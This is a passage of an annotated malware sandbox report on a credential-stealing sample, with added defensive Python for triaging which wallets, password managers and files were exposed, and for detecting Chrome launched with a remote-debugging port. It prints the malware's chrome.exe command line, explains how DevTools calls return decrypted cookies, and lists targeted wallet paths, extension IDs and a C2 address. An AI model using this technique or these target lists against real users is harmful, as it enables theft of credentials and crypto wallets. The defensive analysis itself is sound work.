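    r"C:\Users\alice\Documents\passport_scan.jpg",     # collateral hit on *pass*.*
    r"C:\Users\alice\Documents\quarterly_report.docx",
    r"C:\Users\alice\Desktop\metamask-seed",           # no extension at all
    r"C:\Users\alice\AppData\Roaming\Exodus\exodus.wallet\seed.seco",
]
SAMPLE_INSTALLED_IDS = {
    "nngceckbapebfimnlniiiahkandclblb",   # Bitwarden
    "fijngjgcjhjmmpcmkeiomlglpeiijkld",   # Talisman Wallet
    "abcdefghijklmnopabcdefghijklmnop",   # made-up, not on the list
}


def triage():
    files = files_in_scope(SAMPLE_FILES, parse_masks(GRABBER_MASKS))
    exts = installed_targets(SAMPLE_INSTALLED_IDS, parse_extension_list(EXTENSION_BLOB))
    return files, exts


if __name__ == "__main__":
    files, exts = triage()
    for path, masks in files.items():
        print(f"{path}  <-  {', '.join(masks)}")
    for ext in exts:
        kind = "wallet" if ext.is_wallet else "password manager"
        print(f"{kind:16} {ext.name} ({ext.extension_id})")
```

On a real host, feed files_in_scope the output of a walk over the user profile and installed_targets the directory names under each Chromium profile's Extensions folder; everything the functions return is what the stealer would have packed, which is the list to rotate after an infection like this one.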

Remote Access Functionality

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.N11R7lRasm.exe.aa00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.N11R7lRasm.exe.aa40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.N11R7lRasm.exe.aa20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.N11R7lRasm.exe.a9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1855724656.000000000AA00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1855724656.000000000AA20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1906650767.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1855724656.000000000A9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: N11R7lRasm.exe PID: 4424, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 6552, type: MEMORYSTR
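The chrome.exe launch above is the mechanism behind the "Attempt to bypass Chrome Application-Bound Encryption" signature. With --remote-debugging-port set, the browser listens on loopback for the DevTools protocol, and any local process that connects can ask the browser for its cookies (Network.getAllCookies, Storage.getCookies) already decrypted, so the stealer never has to touch the app-bound key itself; the browser does the decryption on its behalf. The detection below is an added example written for this page, not part of the report and not Joe Sandbox code. It runs over constructed Sysmon-style records (EventID 1 process creation, EventID 3 network connection): it flags a Chromium-family browser started with a remote-debugging switch by a parent that is not itself a browser, then ties any non-browser process connecting to that loopback port back to the finding as the DevTools client. The first record mirrors the command line and parent seen in this report; the process IDs and the other records are made up, and the browser and launcher name sets are assumptions to tune per environment.

```python
"""Detect a browser started with DevTools remote debugging by a non-browser
parent and correlate the loopback client that uses the port.

Added example for this page (editor's code, not from the report or the sample).
SAMPLE_EVENTS are constructed Sysmon-style records; the first one reproduces the
chrome.exe command line and parent image shown above, PIDs are invented.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe", "chromium.exe"}
INTERACTIVE_LAUNCHERS = {"explorer.exe", "userinit.exe"}   # assumed benign parents; tune per fleet
LOOPBACK = {"127.0.0.1", "::1"}

PORT_RE = re.compile(r"--remote-debugging-port=(\d+)", re.IGNORECASE)
PIPE_RE = re.compile(r"--remote-debugging-pipe\b", re.IGNORECASE)


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    pid: int
    image: str
    parent_image: str
    port: Optional[int]            # None when --remote-debugging-pipe was used
    command_line: str
    severity: str
    devtools_clients: List[int] = field(default_factory=list)   # PIDs that connected to the port


def detect_devtools_abuse(events) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        if ev["EventID"] != 1 or basename(ev["Image"]) not in BROWSERS:
            continue
        cmd = ev["CommandLine"]
        port = PORT_RE.search(cmd)
        if not port and not PIPE_RE.search(cmd):
            continue
        parent = basename(ev["ParentImage"])
        if parent in BROWSERS:
            continue   # helper processes the browser spawns itself inherit the switch
        findings.append(Finding(
            pid=ev["ProcessId"], image=ev["Image"], parent_image=ev["ParentImage"],
            port=int(port.group(1)) if port else None, command_line=cmd,
            severity="medium" if parent in INTERACTIVE_LAUNCHERS else "high"))

    # A non-browser process connecting to the debugging port is the DevTools
    # client, i.e. the process that actually pulls the decrypted cookies.
    by_port = {f.port: f for f in findings if f.port is not None}
    for ev in events:
        if ev["EventID"] != 3 or ev["DestinationIp"] not in LOOPBACK:
            continue
        hit = by_port.get(ev["DestinationPort"])
        if hit and basename(ev["Image"]) not in BROWSERS:
            hit.devtools_clients.append(ev["ProcessId"])
    return findings


SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 6620,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                    r'--remote-debugging-port=9223 --profile-directory="Default"'},
    {"EventID": 1, "ProcessId": 6700,   # child of the browser: not a separate finding
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                    r'--type=utility --remote-debugging-port=9223 --lang=en-US'},
    {"EventID": 1, "ProcessId": 7100,   # ordinary user launch: clean
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" '
                    r'--profile-directory=Default'},
    {"EventID": 3, "ProcessId": 6552,   # the stealer talking to the DevTools port
     "Image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 9223},
    {"EventID": 3, "ProcessId": 6620,   # browser's own outbound traffic: ignored
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "142.250.185.228", "DestinationPort": 443},
]

if __name__ == "__main__":
    for f in detect_devtools_abuse(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid {f.pid} {basename(f.image)} started by "
              f"{basename(f.parent_image)} with DevTools on port {f.port}; "
              f"loopback clients: {f.devtools_clients or 'none seen'}")
```

The parent-image test is what keeps the rule quiet on developer machines: a browser with a debugging port is common under test tooling, but one started by an executable sitting in C:\Windows\BitLockerDiscoveryVolumeContents, followed within seconds by that executable connecting to the port, has only one realistic explanation.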
MITRE ATT&CK Matrix

One line per tactic, techniques in matrix row order. The number in brackets is the matched-signature count the report renders for that technique (reproduced as rendered); entries without a count are empty matrix cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API [2]; Command and Scripting Interpreter [2]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Create Account [1]; Registry Run Keys / Startup Folder [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Extra Window Memory Injection [1]; Process Injection [411]; Registry Run Keys / Startup Folder [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Extra Window Memory Injection [1]; Masquerading [11]; Virtualization/Sandbox Evasion [1]; Process Injection [411]; Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping [2]; Credentials in Registry [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [4]; System Information Discovery [35]; Query Registry [1]; Security Software Discovery [11]; Virtualization/Sandbox Evasion [1]; Process Discovery [12]; System Owner/User Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Local System [4]; Screen Capture [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [2]; Encrypted Channel [21]; Remote Access Software [1]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1614222  Sample: N11R7lRasm.exe  Start date: 13/02/2025  Architecture: WINDOWS  Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

Process tree (node numbers as in the graph; the figures after a process name are the graph's created-registry-values / created-files counters, reproduced as rendered):

N11R7lRasm.exe (node 8)
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    BitLockerToGo.exe 50 (node 13)
        network: 77.239.117.222, 443, 49713, 49714 DATAHOPDatahop-SixDegreesGB United Kingdom; 127.0.0.1 (unknown AS/country)
        dropped: C:\ProgramData\t0r90\f379r9 (PE32+)
        signatures: Attempt to bypass Chrome Application-Bound Encryption; Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); 5 other signatures
        msedge.exe 2 11 (node 26)
            signature: Monitors registry run keys for changes
            msedge.exe (node 34)
        chrome.exe 8 (node 29)
            network: 192.168.2.8, 138, 443, 49705 (unknown AS/country); 239.255.255.250 (Reserved)
            chrome.exe (node 36)
                network: www.google.com 142.250.185.228, 443, 49723, 49726 GOOGLEUS United States; plus.l.google.com; 2 other IPs or domains
        cmd.exe (node 32)
            conhost.exe (node 39)
            timeout.exe (node 41)
msedge.exe 622 (node 11)
    msedge.exe (nodes 18, 20, 22, 24)
        node 18 network: c-msn-pme.trafficmanager.net 13.74.129.1, 443, 49765 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 20.110.205.119, 443, 49819, 49843 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 30 other IPs or domains

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.